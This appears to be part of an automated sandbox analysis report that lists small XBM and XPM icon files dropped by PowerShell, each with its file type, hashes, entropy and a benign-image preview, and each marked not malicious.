                                                                                                                                                                                                              Preview:#define combobox_width 32..#define combobox_height 32..static unsigned char combobox_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0xfc, 0xff, 0xff, 0x3e, 0x04, 0x00, 0x80, 0x2a, 0x04, 0x00, 0x80, 0x2a,.. 0x04, 0x00, 0x80, 0x2a, 0x04, 0x00, 0x80, 0x2b, 0xfc, 0xff, 0xff, 0x3e,.. 0x08, 0x00, 0x00, 0x20, 0x08, 0x00, 0x00, 0x3e, 0x08, 0x00, 0x00, 0x2a,.. 0x28, 0x49, 0x00, 0x2a, 0x08, 0x00, 0x00, 0x3e, 0x08, 0x00, 0x00, 0x22,.. 0x08, 0x00, 0x00, 0x22, 0x28, 0x49, 0x12, 0x22, 0x08, 0x00, 0x00, 0x22,.. 0x08, 0x00, 0x00, 0x22, 0x08, 0x00, 0x00, 0x22, 0x28, 0x49, 0x02, 0x22,.. 0x08, 0x00, 0x00, 0x3e, 0x08, 0x00, 0x00, 0x2a, 0x08, 0x00, 0x00, 0x2a,.. 0xf8, 0xff, 0xff, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2367
                                                                                                                                                                                                              Entropy (8bit):3.085807518072439
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jp9sB7t31/D3zoNyOyUlysyVxtvXZ7nYD:hNV3lfH
                                                                                                                                                                                                              MD5:2EC8898E267F4701AF642274C7E56CC0
                                                                                                                                                                                                              SHA1:409C515F21EC86B45297BF89A5F41BD5076EE093
                                                                                                                                                                                                              SHA-256:7479460890F5E0D184B484B39D34CBDBC423F13C88B59376BFF60A441DDA9DFC
                                                                                                                                                                                                              SHA-512:AA847C5B1BF936677F0DC9A67C2387522673696D587D28BEB937E1FEE13EDE5C5341E5DB01253E02DB0470BE42FD46389E65A7C88D51CF0DEEDD5CA41AAB272A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * combobox_xpm[] = {.."50 40 6 1",.." .s None.c None",.."..c black",.."X.c white",.."o.c #FFFF80808080",.."O.c gray70",.."+.c #808000008080",.." ",.." ",.." ",.." .................................... XXXXXXX ",.." .ooooooooooooooooooooooooooooooooooX X . . ",.." .ooooooooooooooooooooooooooooooooooX X . . ",.." .oooo.oooooooooooooooooooooooooooooX X . . ",.." .oo.o..oo.o.oo.o.ooooooooooooooooooX X . . ",.." .o..o.o.o.oo.oo.oo.ooooooooooooooooX X ... . ",.." .oo.oo.oo.o.oo.ooo.ooooooooooooooooX X . . ",.." .ooooooooooooooooooooooooooooooooooX X . ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X...... ",.." ",.." ",.." ",.." XXXXX
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):904
                                                                                                                                                                                                              Entropy (8bit):3.2841677600101065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Hecx64UddwohQWJKoheV5gtLRKL1LQ5YohRp5gwohRDMtM:FxUxJoQhWLqtM
                                                                                                                                                                                                              MD5:A4EC724DC948F7094DC0EACB5A960F40
                                                                                                                                                                                                              SHA1:0FCFE0DD79A951A593256A7257A7410A0294F546
                                                                                                                                                                                                              SHA-256:459E941ECD87984672BF1255DA19A8DE74F114E173E838F6B85AC734E7EF5FD1
                                                                                                                                                                                                              SHA-512:2C6CCDA98D2C665DFFB7E7340AD44822780E20E3EBB0493B58A313C0C46A62BB21BE94CA0E3226AA52F410CF6CE3F0C2B2C95A0434C6E0678E77EC4CA55EEC32
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define drivea_width 32..#define drivea_height 32..static unsigned char drivea_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0xf8, 0xff, 0xff, 0x1f, 0x08, 0x00, 0x00, 0x18, 0xa8, 0xaa, 0xaa, 0x1a,.. 0x48, 0x55, 0xd5, 0x1d, 0xa8, 0xaa, 0xaa, 0x1b, 0x48, 0x55, 0x55, 0x1d,.. 0xa8, 0xfa, 0xaf, 0x1a, 0xc8, 0xff, 0xff, 0x1d, 0xa8, 0xfa, 0xaf, 0x1a,.. 0x48, 0x55, 0x55, 0x1d, 0xa8, 0xaa, 0xaa, 0x1a, 0x48, 0x55, 0x55, 0x1d,.. 0xa8, 0xaa, 0xaa, 0x1a, 0xf8, 0xff, 0xff, 0x1f, 0xf8, 0xff, 0xff, 0x1f,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1414
                                                                                                                                                                                                              Entropy (8bit):2.9996667911599797
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UGNvbLlI29wSpoFB58mdPblblPONULHONPPP6f:jdHlI2yS0BemdPZZPiUriPPPM
                                                                                                                                                                                                              MD5:93D39C85D0D9052A1EB932904E93DA24
                                                                                                                                                                                                              SHA1:6FD812FCA35B166BA57C7A4E4A21C3D1A371959D
                                                                                                                                                                                                              SHA-256:05164D5BECDDA54104B20BC8F7358F627BE9F2602D6B3E344A3033D92E73D148
                                                                                                                                                                                                              SHA-512:7032169B5952043FEFB0856C01ACF7CFA1632A4ECAB4F460B0634CD8D5BC0DE270F32586246B44ECA13CE555BC893D44B1F659E125FEF1FB1854DFB4ED89BE55
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * drivea_xpm[] = {../* width height ncolors chars_per_pixel */.."32 32 5 1",../* colors */.." .s None.c None",.."..c #000000000000",.."X.c white",.."o.c #c000c000c000",.."O.c #800080008000",../* pixels */.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." .......................... ",.." .XXXXXXXXXXXXXXXXXXXXXXXo. ",.." .XooooooooooooooooooooooO. ",.." .Xooooooooooooooooo..oooO. ",.." .Xooooooooooooooooo..oooO. ",.." .XooooooooooooooooooooooO. ",.." .Xoooooooo.......oooooooO. ",.." .Xoo...................oO. ",.." .Xoooooooo.......oooooooO. ",.." .XooooooooooooooooooooooO. ",.." .XooooooooooooooooooooooO. ",.." .XooooooooooooooooooooooO.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2341
                                                                                                                                                                                                              Entropy (8bit):2.5324673546160335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UGhxGxukweksgkTTzTzTzTzTzTzTzTTNf:jCjhk58
                                                                                                                                                                                                              MD5:6D681CE793FEC24AB186A93410BA696D
                                                                                                                                                                                                              SHA1:A56DA9AFC76DA93AF9EA84BEBA6F1C747D5F83A4
                                                                                                                                                                                                              SHA-256:06B4BEC92F4B28AFC161359E66A76CF20C32409D98D5B4D2201679BAD5FD9300
                                                                                                                                                                                                              SHA-512:E117EDA4B30ECF6A3F471A5CCDE7FEC29987C8EC4A65C18F768825A43E2A515CF189D0F1A7C41BCA45382820D4FA498EE66349520418D3756059B0A3CF24E319
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * exit_xpm[] = {.."50 40 5 1",.." .s None.c None",.."..c black",.."X.c white",.."o.c #000080800000",.."O.c yellow",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ....................................... ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX. ",.." .XoooooooooooooooooooooooooooooooooooX. ",.." .XoooooooooooooooooooooooooooooooooooX. ",.." .XoooooooooooooooooooooooOoooooooooooX. ",.." .XoooooooooooooooooooooooOOooooooooooX. ",.." .XoooooooooooooooooooooooOOOo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                              Entropy (8bit):3.3103540672735567
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAKyiH0KG4l9htwGfHKDRf6Rqvsh4mo5GY5Gl5GyI5GLvsh4/Rf6RTquf:HeY6uSssuYpiSbsuZSTD
                                                                                                                                                                                                              MD5:007B0E25797E560AEBCF0207BAFB04DF
                                                                                                                                                                                                              SHA1:55EADB8491D9EED185CD5C9C6B218311B6B66D8E
                                                                                                                                                                                                              SHA-256:3C88D5A7BD7D3715C883FC14F03749CB273BC591A654FA57EE2E857BA6865919
                                                                                                                                                                                                              SHA-512:1F3B18D2A85614CF6412ADC7A18CC2C06F7357D14B8A9C95901FE602C0CF0368282AE2D798775C55FBFDD61F598EA40BBDF0311E0F28527946E973FE256B36C5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define filebox_width 32..#define filebox_height 32..static unsigned char filebox_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0xfc, 0xff, 0xff, 0x3f, 0x04, 0x00, 0x00, 0x20,.. 0xe4, 0xff, 0xff, 0x27, 0x24, 0x00, 0x00, 0x24, 0x24, 0x00, 0x00, 0x24,.. 0xe4, 0xff, 0xff, 0x27, 0x04, 0x00, 0x00, 0x20, 0xe4, 0x7f, 0xfe, 0x27,.. 0x24, 0x50, 0x02, 0x25, 0x24, 0x40, 0x02, 0x24, 0x24, 0x50, 0x02, 0x25,.. 0x24, 0x40, 0x02, 0x24, 0x24, 0x50, 0x02, 0x25, 0x24, 0x40, 0x02, 0x24,.. 0x24, 0x50, 0x02, 0x25, 0xe4, 0x7f, 0xfe, 0x27, 0x04, 0x00, 0x00, 0x20,.. 0xe4, 0xff, 0xff, 0x27, 0x24, 0x00, 0x00, 0x24, 0x24, 0x00, 0x00, 0x24,.. 0xe4, 0xff, 0xff, 0x27, 0x04, 0x00, 0x00, 0x20, 0xfc, 0xff, 0xff, 0x3f,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2359
                                                                                                                                                                                                              Entropy (8bit):3.1899800750457135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jnwvNiNiFYCC9/jFzv99999999999l/jNnN1FvZ:UqHpNl
                                                                                                                                                                                                              MD5:147BE262AEEF87983D836BC39AB00831
                                                                                                                                                                                                              SHA1:12CAD2BC2CDD445052B79E1EA36CA2D177E04999
                                                                                                                                                                                                              SHA-256:55F5F55324BDA873D0AC1888823F1FD078BA8D7910159026C66540538F0A41A7
                                                                                                                                                                                                              SHA-512:E94D0AD528BCBF42FCDCED5FC5E503FEDAA202AF2FBC5A019BC816FF6F40DBB740235FD50B8D5F649BC7959B99F3A738EFFEB2AD232E22C500C5A3DF89372688
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * filebox_xpm[] = {.."50 40 6 1",.." .s None.c None",.."..c white",.."X.c gray80",.."o.c black",.."O.c #FFFF80808080",.."+.c gray70",.." ",.." ",.." ",.." ............................................ ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXooXooXoXooXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXooXooXoXooXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXooooooooooooooooooooooooooooooooooooo.XXo ",.." .XXoOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XXo ",.." .XXoOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO.XXo ",.." .XX......................................XXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXoooooooooooooooo.XXXXoooooooooooooooo.XXo ",.." .XXo+++++++++
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):904
                                                                                                                                                                                                              Entropy (8bit):3.2841677600101065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Hecx64UddwohQWJKoheV5gtLRKL1LQ5YohRp5gwohRDMtM:FxUxJoQhWLqtM
                                                                                                                                                                                                              MD5:A4EC724DC948F7094DC0EACB5A960F40
                                                                                                                                                                                                              SHA1:0FCFE0DD79A951A593256A7257A7410A0294F546
                                                                                                                                                                                                              SHA-256:459E941ECD87984672BF1255DA19A8DE74F114E173E838F6B85AC734E7EF5FD1
                                                                                                                                                                                                              SHA-512:2C6CCDA98D2C665DFFB7E7340AD44822780E20E3EBB0493B58A313C0C46A62BB21BE94CA0E3226AA52F410CF6CE3F0C2B2C95A0434C6E0678E77EC4CA55EEC32
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define drivea_width 32..#define drivea_height 32..static unsigned char drivea_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0xf8, 0xff, 0xff, 0x1f, 0x08, 0x00, 0x00, 0x18, 0xa8, 0xaa, 0xaa, 0x1a,.. 0x48, 0x55, 0xd5, 0x1d, 0xa8, 0xaa, 0xaa, 0x1b, 0x48, 0x55, 0x55, 0x1d,.. 0xa8, 0xfa, 0xaf, 0x1a, 0xc8, 0xff, 0xff, 0x1d, 0xa8, 0xfa, 0xaf, 0x1a,.. 0x48, 0x55, 0x55, 0x1d, 0xa8, 0xaa, 0xaa, 0x1a, 0x48, 0x55, 0x55, 0x1d,.. 0xa8, 0xaa, 0xaa, 0x1a, 0xf8, 0xff, 0xff, 0x1f, 0xf8, 0xff, 0xff, 0x1f,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1414
                                                                                                                                                                                                              Entropy (8bit):2.9996667911599797
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UGNvbLlI29wSpoFB58mdPblblPONULHONPPP6f:jdHlI2yS0BemdPZZPiUriPPPM
                                                                                                                                                                                                              MD5:93D39C85D0D9052A1EB932904E93DA24
                                                                                                                                                                                                              SHA1:6FD812FCA35B166BA57C7A4E4A21C3D1A371959D
                                                                                                                                                                                                              SHA-256:05164D5BECDDA54104B20BC8F7358F627BE9F2602D6B3E344A3033D92E73D148
                                                                                                                                                                                                              SHA-512:7032169B5952043FEFB0856C01ACF7CFA1632A4ECAB4F460B0634CD8D5BC0DE270F32586246B44ECA13CE555BC893D44B1F659E125FEF1FB1854DFB4ED89BE55
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * drivea_xpm[] = {../* width height ncolors chars_per_pixel */.."32 32 5 1",../* colors */.." .s None.c None",.."..c #000000000000",.."X.c white",.."o.c #c000c000c000",.."O.c #800080008000",../* pixels */.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." .......................... ",.." .XXXXXXXXXXXXXXXXXXXXXXXo. ",.." .XooooooooooooooooooooooO. ",.." .Xooooooooooooooooo..oooO. ",.." .Xooooooooooooooooo..oooO. ",.." .XooooooooooooooooooooooO. ",.." .Xoooooooo.......oooooooO. ",.." .Xoo...................oO. ",.." .Xoooooooo.......oooooooO. ",.." .XooooooooooooooooooooooO. ",.." .XooooooooooooooooooooooO. ",.." .XooooooooooooooooooooooO.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):296
                                                                                                                                                                                                              Entropy (8bit):3.8768575679587056
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA2Rf6orM02Rq1D95RJQfHWE4ihSpQhYh83Ts:Hefiaaq1J5RJNE4ikmQ
                                                                                                                                                                                                              MD5:EE609FE63F25B79D58AB3B20498B3E10
                                                                                                                                                                                                              SHA1:80A1D6A243685E6AEE080DC9E49AD0E8F7A9A704
                                                                                                                                                                                                              SHA-256:19476DDC404A077FB5D07044453D003FC7043F7CB3E4942525631CE19E129491
                                                                                                                                                                                                              SHA-512:A5F2595D83D9C2115ACE42B35C7A046E9D01A92E8F14D8C23A6846BFAEBB17E7183232F4AA22E22AB45458696372B038F1F71BC7D3CF047CDE017E6BD6BBC471
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define italic_width 16..#define italic_height 16..static unsigned char italic_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x80, 0x3f, 0x80, 0x3f, 0x00, 0x06, 0x00, 0x06,.. 0x00, 0x03, 0x00, 0x03, 0x80, 0x01, 0x80, 0x01, 0xc0, 0x00, 0xc0, 0x00,.. 0x60, 0x00, 0x60, 0x00, 0xfc, 0x01, 0xfc, 0x01};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):299
                                                                                                                                                                                                              Entropy (8bit):3.94223503149522
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA/orM0DMC1D9ilfH5Bv/Y6JgvXnH9LgJm:HeianMC1JsBvw6SvH9Mo
                                                                                                                                                                                                              MD5:045DC37A81CA7BE324476748C60F5875
                                                                                                                                                                                                              SHA1:6905A9296EA8D3316C95535CC01F387C02293C67
                                                                                                                                                                                                              SHA-256:09EF1CEC38C60BF480D4A955CA60A67E78B27571025FD7FE9DE43650AA22A044
                                                                                                                                                                                                              SHA-512:365A9ECF603CA2EA727A09B1987117C08D1AE7FA3B1CAA84769627BB407AD66CF2FE29A2C92E0473FCF5040AD9BC3BA6887FE524890421D292A0C26A6AA53E6B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define justify_width 16..#define justify_height 16..static unsigned char justify_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xec, 0xdb, 0x00, 0x00, 0x7c, 0xdb,.. 0x00, 0x00, 0xbc, 0xf7, 0x00, 0x00, 0xdc, 0xde, 0x00, 0x00, 0x6c, 0xdf,.. 0x00, 0x00, 0x6c, 0xef, 0x00, 0x00, 0xdc, 0xdf};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):293
                                                                                                                                                                                                              Entropy (8bit):3.8735287590360485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAr6orM0AD9xfHD3TaJPVvFVdVKJfjnYey:Hee6aMJM9VqJLzy
                                                                                                                                                                                                              MD5:919BF6926BCAF8223B5DF827BE839A45
                                                                                                                                                                                                              SHA1:933C23C02DFF67CE24DFC535BB1799AA5AC16DC8
                                                                                                                                                                                                              SHA-256:CC37EBC5F953C8DC851960DE244DE639DEF70D79065859E908D6444CBE50A6E5
                                                                                                                                                                                                              SHA-512:38DC66BE86B79930BEFEE24BCCE1310D0B3F920CBA6EC1B86E674D41F5137EED952E02B241CEF2FF69D0E9A992C1EF793936A283820D08E67347ED9758CF3D6B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define leftj_width 16..#define leftj_height 16..static unsigned char leftj_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xcc, 0x6d, 0x00, 0x00, 0xdc, 0x01,.. 0x00, 0x00, 0xec, 0x0e, 0x00, 0x00, 0xfc, 0x7e, 0x00, 0x00, 0xdc, 0x03,.. 0x00, 0x00, 0x6c, 0x3b, 0x00, 0x00, 0x6c, 0x1f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):898
                                                                                                                                                                                                              Entropy (8bit):3.3257305333899017
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HeJJoJJ6sss4BkL4nBWSrT2wwiLbL48mMS3pPtTIpkK:xFs7TEwXyNSr
                                                                                                                                                                                                              MD5:23F6B504A1004A9A2C91D0FCF5BCE9B2
                                                                                                                                                                                                              SHA1:4EA189C3AF76A7DF714C397BEA1E32C1625D115C
                                                                                                                                                                                                              SHA-256:9EFEE21D14731A4D7B3BD7D9E3C02198BCA7195173E009C25EF54A7538C93780
                                                                                                                                                                                                              SHA-512:0B82BDFEBB4FAD94B74207D23616633EEE955F8203A020F4F4B957E61EFECE1609440741A60822E4884FADF4DDDF43CAE34B519B64A5E018E7A8031E8CD561B4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define netw_width 32..#define netw_height 32..static unsigned char netw_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0x7f, 0x00, 0x00, 0x02, 0x40,.. 0x00, 0x00, 0xfa, 0x5f, 0x00, 0x00, 0x0a, 0x50, 0x00, 0x00, 0x0a, 0x52,.. 0x00, 0x00, 0x0a, 0x52, 0x00, 0x00, 0x8a, 0x51, 0x00, 0x00, 0x0a, 0x50,.. 0x00, 0x00, 0x4a, 0x50, 0x00, 0x00, 0x0a, 0x50, 0x00, 0x00, 0x0a, 0x50,.. 0x00, 0x00, 0xfa, 0x5f, 0x00, 0x00, 0x02, 0x40, 0xfe, 0x7f, 0x52, 0x55,.. 0x02, 0x40, 0xaa, 0x6a, 0xfa, 0x5f, 0xfe, 0x7f, 0x0a, 0x50, 0xfe, 0x7f,.. 0x0a, 0x52, 0x80, 0x00, 0x0a, 0x52, 0x80, 0x00, 0x8a, 0x51, 0x80, 0x00,.. 0x0a, 0x50, 0x80, 0x00, 0x4a, 0x50, 0x80, 0x00, 0x0a, 0x50, 0xe0, 0x03,.. 0x0a, 0x50, 0x20, 0x02, 0xfa, 0xdf, 0x3f, 0x03, 0x02, 0x40, 0xa0, 0x02,.. 0x52, 0x55, 0xe0, 0x03, 0xaa, 0x6a, 0x00, 0x00, 0xfe, 0x7f, 0x00, 0x00,.. 0xfe, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1431
                                                                                                                                                                                                              Entropy (8bit):3.450442916925295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UGIZfbLlIT09wSpoCIR9J58Hr7bN65S65S6c6E6ZS6EcS7WEarkv5j5jFNZjrOsJ:jIZfHlIgySuRXeDw5D5DltZVB3rwNdOC
                                                                                                                                                                                                              MD5:5165AAE8ED4C6EE20B9AA6C3304E8042
                                                                                                                                                                                                              SHA1:2404F7443E8797E335DD6BD93D8CF67DEC291482
                                                                                                                                                                                                              SHA-256:068E6F025C1E4BB5B019FF51416FCEDD4E5D211D5FCA99412B19DED1295B2556
                                                                                                                                                                                                              SHA-512:BA573C5EB9F92F5C31236A35B021B366E4450B26F077F4C0F18FFD7F83A590E8E8415F7ECF057186AE0B0178BA04B13F5060C705C4A05FDD1A1ED4FFB911D0A9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * netw_xpm[] = {../* width height ncolors chars_per_pixel */.."32 32 7 1",../* colors */.." .s None.c None",.."..c #000000000000",.."X.c white",.."o.c #c000c000c000",.."O.c #404040",.."+.c blue",.."@.c red",../* pixels */.." ",.." .............. ",.." .XXXXXXXXXXXX. ",.." .XooooooooooO. ",.." .Xo.......XoO. ",.." .Xo.++++o+XoO. ",.." .Xo.++++o+XoO. ",.." .Xo.++oo++XoO. ",.." .Xo.++++++XoO. ",.." .Xo.+o++++XoO. ",.." .Xo.++++++XoO. ",.." .Xo.XXXXXXXoO. ",.." .XooooooooooO. ",.." .Xo@ooo....oO. ",.." .............. .XooooooooooO. ",.." .XXXXXXXXXXXX. .XooooooooooO. ",.." .XooooooooooO. .OOOOOOOOOOOO. ",.." .Xo.......XoO. .............. ",.." .Xo.++++o+XoO. @ ",.." .Xo.++++o+XoO. @ ",.." .Xo.++oo++Xo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):898
                                                                                                                                                                                                              Entropy (8bit):3.3257305333899017
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:HeJJoJJ6sss4BkL4nBWSrT2wwiLbL48mMS3pPtTIpkK:xFs7TEwXyNSr
                                                                                                                                                                                                              MD5:23F6B504A1004A9A2C91D0FCF5BCE9B2
                                                                                                                                                                                                              SHA1:4EA189C3AF76A7DF714C397BEA1E32C1625D115C
                                                                                                                                                                                                              SHA-256:9EFEE21D14731A4D7B3BD7D9E3C02198BCA7195173E009C25EF54A7538C93780
                                                                                                                                                                                                              SHA-512:0B82BDFEBB4FAD94B74207D23616633EEE955F8203A020F4F4B957E61EFECE1609440741A60822E4884FADF4DDDF43CAE34B519B64A5E018E7A8031E8CD561B4
                                                                                                                                                                                                              Malicious:false
